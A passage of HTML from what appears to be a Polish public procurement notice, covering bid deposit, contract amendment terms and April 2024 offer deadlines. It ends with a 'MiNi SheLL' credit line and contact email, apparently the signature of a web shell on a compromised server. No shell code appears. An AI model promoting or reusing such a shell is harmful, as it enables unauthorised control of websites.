class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda od Wykonawców wniesienia wadium w kwocie 45.000 PLN. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmianę umowy w przypadkach określonych w art. 455 Pzp oraz na zasadach określonych w projektach umów stanowiących zał. nr. 1 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-16 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę poprzez portal SIDAS PZP, któy jest dostepny po zalogowaniu na stronie app.sidaspzp.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-16 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com